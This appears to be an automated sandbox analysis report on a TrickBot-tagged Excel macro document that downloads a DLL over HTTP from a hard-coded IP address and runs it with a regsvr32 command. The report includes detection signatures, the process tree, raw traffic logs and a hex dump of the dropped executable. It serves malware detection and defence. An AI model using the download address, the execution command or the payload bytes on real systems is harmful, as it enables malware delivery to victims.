Play interactive tour

Edit tour

Analysis Report Order_Summary-9632850.xlsb

Overview

General Information

Sample Name:	Order_Summary-9632850.xlsb
Analysis ID:	432380
MD5:	d091fb57338164acff3bd648a1782fd9
SHA1:	ca63bade67055580f6be380cd41bb98affd5de49
SHA256:	12bbd7661b6fd48f3552101588625bde0709dd68b28a0677d000a02389e3b812
Tags:	sat1TrickBotxlsbxlsx
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Drops PE files to the user root directory

Found Excel 4.0 Macro with suspicious formulas

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Abnormal high CPU Usage

Antivirus or Machine Learning detection for unpacked file

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Found dropped PE file which has not been started or loaded

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Registers a DLL

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Xls With Macro 4.0

Classification

Process Tree

System is w10x64

EXCEL.EXE (PID: 5620 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)

regsvr32.exe (PID: 4912 cmdline: regsvr32 -s ..\kdldyeff.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

cmd.exe (PID: 5800 cmdline: C:\Windows\system32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
app.xml	JoeSecurity_XlsWithMacro4	Yara detected Xls With Macro 4.0	Joe Security

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -s ..\kdldyeff.dll, CommandLine: regsvr32 -s ..\kdldyeff.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5620, ProcessCommandLine: regsvr32 -s ..\kdldyeff.dll, ProcessId: 4912

Signature Overview

Click to jump to signature section

Show All Signature Results

Source: 3.2.regsvr32.exe.2c00000.2.unpack

Avira: Label: TR/Dropper.Gen

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\kdldyeff.dll			Jump to behavior

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: sat1_0609_2[1].dll.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Section loaded: unknown origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe

Source: global traffic

TCP traffic: 192.168.2.3:49715 -> 185.180.199.121:80

Source: global traffic

TCP traffic: 192.168.2.3:49715 -> 185.180.199.121:80

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 10 Jun 2021 06:47:07 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.3.28Last-Modified: Wed, 09 Jun 2021 20:56:10 GMTETag: "803e0-5c45b81110e80"Accept-Ranges: bytesContent-Length: 525280Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 de a0 b9 12 9a c1 d7 41 9a c1 d7 41 9a c1 d7 41 cc de c4 41 bf c1 d7 41 9a c1 d7 41 a2 c1 d7 41 f8 de c4 41 89 c1 d7 41 9a c1 d6 41 53 c0 d7 41 19 dd d9 41 81 c1 d7 41 72 de dd 41 16 c1 d7 41 22 c7 d1 41 9b c1 d7 41 72 de dc 41 c7 c1 d7 41 72 de d3 41 9b c1 d7 41 52 69 63 68 9a c1 d7 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 93 84 74 60 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 06 00 00 40 02 00 00 d0 05 00 00 00 00 00 d9 bd 00 00 00 10 00 00 00 50 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 08 00 00 10 00 00 64 dd 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 db 02 00 55 00 00 00 b8 c0 02 00 f0 00 00 00 00 50 03 00 b8 69 04 00 00 00 00 00 00 00 00 00 00 e0 07 00 e0 23 00 00 00 c0 07 00 b8 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 02 00 14 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a7 37 02 00 00 10 00 00 00 40 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b5 8b 00 00 00 50 02 00 00 90 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e8 63 00 00 00 e0 02 00 00 30 00 00 00 e0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 69 04 00 00 50 03 00 00 70 04 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d2 5f 00 00 00 c0 07 00 00 60 00 00 00 80 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic

HTTP traffic detected: GET /sat1_0609_2.dll HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.180.199.121Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121

Source: global traffic

Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.cortana.ai
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.office.net
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.onedrive.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://augloop.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://cdn.entity.
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://cortana.ai
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://cortana.ai/api
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://cr.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://directory.services.
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://graph.windows.net
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://graph.windows.net/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://login.windows.local
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://management.azure.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://management.azure.com/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://messaging.office.com/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://officeapps.live.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://onedrive.live.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://outlook.office.com/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
